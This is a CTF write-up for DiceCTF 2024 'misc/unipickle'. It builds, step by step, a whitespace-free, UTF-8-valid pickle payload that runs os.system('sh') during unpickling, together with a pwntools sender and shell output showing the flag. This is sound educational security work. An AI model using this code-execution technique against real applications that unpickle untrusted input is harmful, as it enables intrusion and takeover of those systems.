---
date: '2024-02-06'
tags: ['ctf', 'ctf-misc', 'python']
title: 'DiceCTF 2024 Quals: misc/unipickle'
---
## Task
> **misc/unipickle**
>
> pickle
>
> `nc mc.ax 31773`
>
> [`unipickle.py`](https://static.dicega.ng/uploads/96309f792c0265d8f89a886cbf610816bedf88184e5ec4302ae46f6f7413de7e/unipickle.py)

- `Author: kmh`
- `Points: 144`
- `Solves: 68 / 1040 (6.538%)`

## Writeup

The challenge consists of a very short Python file that just unpickles our input and exits:

```py
#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())
```

Looking at Python's documentation for the `pickle` module, we can see the following:

> Warning: The `pickle` module is not secure. Only unpickle data you trust.
> It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

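A quick search shows that when an object's `__reduce__` method returns a callable and a tuple of arguments, the unpickler calls that callable with those arguments. We can use this to get a shell as follows: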

```py
import pickle
import os

class A:
    def __reduce__(self):
        return (os.system, ('sh',))

payload = pickle.dumps(A())
print(payload)
# b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02sh\x94\x85\x94R\x94.'
```

Now we just need to send this to the program:

```py
from pwn import remote

r = remote('mc.ax', 31773)
r.sendline(payload)
r.interactive()
```

However, when we run this, we get the following error:

```
pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'utf-8' codec can't encode character '\udc80' in position 0: surrogates not allowed
```

The first byte of our payload, `\x80`, is not valid UTF-8, so the `.encode()` call in the challenge rejects it. Our pickle code will need to be a valid UTF-8 string.
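The `'\udc80'` in the message hints at what happens on the server. The following is a minimal local sketch of the same failure, assuming (this is not stated in the challenge file) that the server's stdin is decoded with the `surrogateescape` error handler:

```py
# First two bytes of the protocol 4 payload: the PROTO opcode and its version
raw = b'\x80\x04'

# Assumption: stdin is decoded with errors='surrogateescape', which maps the
# undecodable byte 0x80 to the lone surrogate U+DC80 instead of failing
text = raw.decode('utf-8', errors='surrogateescape')

# The challenge then calls .encode() with the default strict handler,
# which refuses to encode lone surrogates
try:
    text.encode()
    encode_error = None
except UnicodeEncodeError as exc:
    encode_error = exc

print(repr(text))
print(encode_error)
```

Any byte sequence that is not valid UTF-8 would fail the same way, regardless of what the pickle does.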

The pickle format has gone through multiple iterations, called protocols. Protocol 0 was the first pickle format, and was designed to consist entirely of ASCII characters.

Let's try dumping our code again, this time using protocol 0:

```py
payload = pickle.dumps(A(), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'
```

Now we get a different error:

```
pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
_pickle.UnpicklingError: pickle data was truncated
```

A closer look at the code reveals why: `input()` reads only up to the first newline, and `.split()[0]` then keeps only the text before the first whitespace character. Our payload is cut off at `cposix`, meaning that we cannot use any spaces or newlines in our pickle code.

We can try using every protocol available (up to protocol 5), but none of them produces a payload that is both valid UTF-8 and free of whitespace. Since we cannot produce pickle code that will pass this challenge using `pickle.dumps`, we will have to write the pickle code by hand.
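This check can be done locally without touching the server. The sketch below is one way to do it; `survives_filter` is a hypothetical helper name, and it only approximates the server by applying the same `.split()[0].encode()` expression to the decoded bytes:

```py
import os
import pickle


class A:
    def __reduce__(self):
        return (os.system, ('sh',))


def survives_filter(data: bytes) -> bool:
    """Hypothetical helper: True if `data` would reach pickle.loads unchanged."""
    try:
        text = data.decode('utf-8')
    except UnicodeDecodeError:
        return False
    # Same expression the challenge applies to the result of input()
    parts = text.split()
    return len(parts) == 1 and parts[0].encode() == data


# pickle.dumps only calls __reduce__; it does not run os.system
results = {
    protocol: survives_filter(pickle.dumps(A(), protocol=protocol))
    for protocol in range(pickle.HIGHEST_PROTOCOL + 1)
}
print(results)
```

Protocols 0 and 1 fail because `GLOBAL` needs newlines, and protocols 2 and above fail because they start with the `PROTO` opcode `\x80`.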

The `pickletools` module contains a considerable amount of documentation on the pickle format, including a brief overview on pickling:

> "A pickle" is a program for a virtual pickle machine (PM, but more accurately
> called an unpickling machine).  It's a sequence of opcodes, interpreted by the
> PM, building an arbitrarily complex Python object.
>
> For the most part, the PM is very simple:  there are no looping, testing, or
> conditional instructions, no arithmetic and no function calls.  Opcodes are
> executed once each, from first to last, until a STOP opcode is reached.
>
> The PM has two data areas, "the stack" and "the memo".
>
> Many opcodes push Python objects onto the stack; e.g., INT pushes a Python
> integer object on the stack, whose value is gotten from a decimal string
> literal immediately following the INT opcode in the pickle bytestream.  Other
> opcodes take Python objects off the stack.  The result of unpickling is
> whatever object is left on the stack when the final STOP opcode is executed.
>
> The memo is simply an array of objects, or it can be implemented as a dict
> mapping little integers to objects.  The memo serves as the PM's "long term
> memory", and the little integers indexing the memo are akin to variable
> names.  Some opcodes pop a stack object into the memo at a given index,
> and others push a memo object at a given index onto the stack again.

`pickletools` also lets us disassemble pickle code, so let's see how our previous payload works:

```py
>>> import pickletools
>>> pickletools.dis(payload)
    0: c    GLOBAL     'posix system'
   14: p    PUT        0
   17: (    MARK
   18: V        UNICODE    'sh'
   22: p        PUT        1
   25: t        TUPLE      (MARK at 17)
   26: p    PUT        2
   29: R    REDUCE
   30: p    PUT        3
   33: .    STOP
highest protocol among opcodes = 0
```

The important instructions to look at are:
```py
# push the global posix.system onto the pickle stack (which is the same as os.system here)
    0: c    GLOBAL     'posix system'
# push a mark onto the pickle stack
   17: (    MARK
# push the string 'sh' onto the pickle stack
   18: V        UNICODE    'sh'
# pop until the mark and create a tuple of popped items
   25: t        TUPLE      (MARK at 17)
# call stack[-2](*stack[-1]) => posix.system('sh')
   29: R    REDUCE
```
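To see these five instructions at work without spawning a shell, here is a small hand-written sketch that uses the same opcode sequence (minus the `PUT`s) but calls `builtins.len` instead of `posix.system`. The choice of `len` is only for illustration:

```py
import pickle

demo = (
    b'cbuiltins\nlen\n'  # GLOBAL: push builtins.len
    b'('                 # MARK: push a mark
    b'Vsh\n'             # UNICODE: push 'sh'
    b't'                 # TUPLE: pop to the mark, push ('sh',)
    b'R'                 # REDUCE: pop the tuple and the callable, push len('sh')
    b'.'                 # STOP: return the top of the stack
)

result = pickle.loads(demo)
print(result)
```

The `PUT` instructions that `pickle.dumps` emits only write to the memo, which is why they can be dropped here.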

The `GLOBAL` (`'c'`) instruction takes two string arguments, each terminated by a newline, so we cannot use it. The alternative is `STACK_GLOBAL` (`'\x93'`), which takes no inline arguments and instead pops the module name and the attribute name off the stack.

We also cannot use the `UNICODE` (`'V'`) instruction since it takes a single string argument ending in a newline. Instead, we can use the `BINUNICODE` (`'X'`) instruction, which is followed by a little-endian `uint32` and a UTF-8 encoded string with length equal to the first argument.
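As a sketch of that encoding, the following builds a `BINUNICODE` instruction with `struct`. The helper name `binunicode` is made up for this example:

```py
import pickle
import struct


def binunicode(s: str) -> bytes:
    """Hypothetical helper: encode `s` as a BINUNICODE instruction."""
    data = s.encode('utf-8')
    # 'X', then the byte length as a little-endian uint32, then the bytes
    return b'X' + struct.pack('<I', len(data)) + data


print(binunicode('system'))
# Appending STOP ('.') makes a complete pickle that loads back to the string
print(pickle.loads(binunicode('system') + b'.'))
```

Note that the length field is part of the payload too: a string of 9 to 13 or 28 to 32 bytes would put a whitespace byte into it, which `split()` would cut on. The strings used in this challenge are short enough to avoid that.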

Now our pickle code without any whitespace is as follows:

```py
# push 'os' to the stack
payload = b'X\x02\x00\x00\x00os'
# push 'system' to the stack
payload += b'X\x06\x00\x00\x00system'
# pop 'os' and 'system', push os.system
payload += b'\x93'
# push a mark
payload += b'('
# push 'sh'
payload += b'X\x02\x00\x00\x00sh'
# pop mark and 'sh', push ('sh',)
payload += b't'
# pop os.system, ('sh',), call os.system('sh')
payload += b'R'

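# STOP ('.') is omitted: REDUCE already runs os.system('sh'), and the
# unpickler only fails on the missing STOP after the shell exits

# we do not have whitespace in our payload
# (str.split() also splits on \x1c-\x1f, so we check for those as well)
assert all(b not in payload for b in b' \t\n\r\x0b\x0c\x1c\x1d\x1e\x1f')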
```

However, our code is still not valid UTF-8. In valid UTF-8, a byte matching `0b10xxxxxx` is a continuation byte and may only appear inside one of the following multi-byte sequences:

1. a byte matching `0b110xxxxx` followed by 1 byte matching `0b10xxxxxx`
2. a byte matching `0b1110xxxx` followed by 2 bytes matching `0b10xxxxxx`
3. a byte matching `0b11110xxx` followed by 3 bytes matching `0b10xxxxxx`

The only part causing a problem is the `STACK_GLOBAL` instruction, since its opcode is `'\x93'`, or `0b10010011`. The rest of the bytes all have 0 in the most significant bit, so they will not cause any problems.

To fix our code, we will choose to satisfy the first option, as it is the simplest.
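At the byte level, this means placing a single lead byte directly in front of `'\x93'`. A quick sketch with Python's own decoder shows the difference; `is_valid_utf8` is a hypothetical helper and `0xc3` is just one possible lead byte:

```py
def is_valid_utf8(data: bytes) -> bool:
    """Hypothetical helper: True if `data` decodes as strict UTF-8."""
    try:
        data.decode('utf-8')
        return True
    except UnicodeDecodeError:
        return False


stack_global = b'\x93'

# A continuation byte on its own is rejected
print(is_valid_utf8(stack_global))
# Preceded by a two-byte lead byte, it becomes part of one code point
print(is_valid_utf8(b'\xc3' + stack_global))
print(ascii((b'\xc3' + stack_global).decode('utf-8')))
# 0xc0 matches 0b110xxxxx but would be an overlong encoding, so it is rejected
print(is_valid_utf8(b'\xc0' + stack_global))
```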

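Now we just need to find an instruction to come before `STACK_GLOBAL` that ends with a byte matching `0b110xxxxx`. More precisely, that byte must lie between `0xc2` and `0xdf`, since `0xc0` and `0xc1` would start overlong encodings, which UTF-8 decoders reject. Additionally, this instruction must not push or pop anything from the stack because we need `'os'` and `'system'` to be on top when `STACK_GLOBAL` is executed.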

One such instruction is the `BINPUT` (`'q'`) instruction, which is followed by a `uint8` that specifies which index of the memo to copy the top of the stack into. This is effectively a no-op in our case.

After inserting the following line right before we add `STACK_GLOBAL`, our code becomes valid UTF-8:

```py
# put 'system' into index 195 of the memo
payload += b'q\xc3'
```
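Before sending anything, the whole payload can be checked locally. The sketch below is an illustration under a few assumptions: `build_payload` and `challenge_filter` are hypothetical helpers, a `STOP` opcode is appended so that the harmless variant returns a value, and the real payload is only run through the filter, never unpickled:

```py
import pickle
import struct


def build_payload(module: str, name: str, arg: str) -> bytes:
    """Hypothetical helper assembling the opcode sequence described above."""
    def binunicode(s: str) -> bytes:
        data = s.encode('utf-8')
        return b'X' + struct.pack('<I', len(data)) + data

    return (
        binunicode(module)
        + binunicode(name)
        + b'q\xc3'  # BINPUT 195: no stack effect, ends in a UTF-8 lead byte
        + b'\x93'   # STACK_GLOBAL: now a valid continuation byte
        + b'('      # MARK
        + binunicode(arg)
        + b't'      # TUPLE
        + b'R'      # REDUCE
        + b'.'      # STOP, added so the harmless demo returns a value
    )


def challenge_filter(data: bytes) -> bytes:
    """Mimic input(...).split()[0].encode() for bytes that decode as UTF-8."""
    return data.decode('utf-8').split()[0].encode()


# The real payload is only checked against the filter, never unpickled here
real = build_payload('os', 'system', 'sh')
assert challenge_filter(real) == real

# A harmless stand-in with the same structure: len('sh')
demo = build_payload('builtins', 'len', 'sh')
print(pickle.loads(challenge_filter(demo)))
```

If the filter returns the payload unchanged, the bytes that reach `pickle.loads` on the server should be exactly the ones we built.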

Running our script now successfully gives us a shell. From here, we run the following commands to get the flag:

```console
$ ls /
app
bin
boot
dev
etc
flag.eEdyUbJSVb2TmzALwXHS.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.eEdyUbJSVb2TmzALwXHS.txt
dice{pickle_5d9ae1b0fee}
```

## Reference

- [pickle documentation](https://docs.python.org/3/library/pickle.html)
- [pickletools.py](https://github.com/python/cpython/blob/main/Lib/pickletools.py)
- [UTF-8](https://en.wikipedia.org/wiki/UTF-8)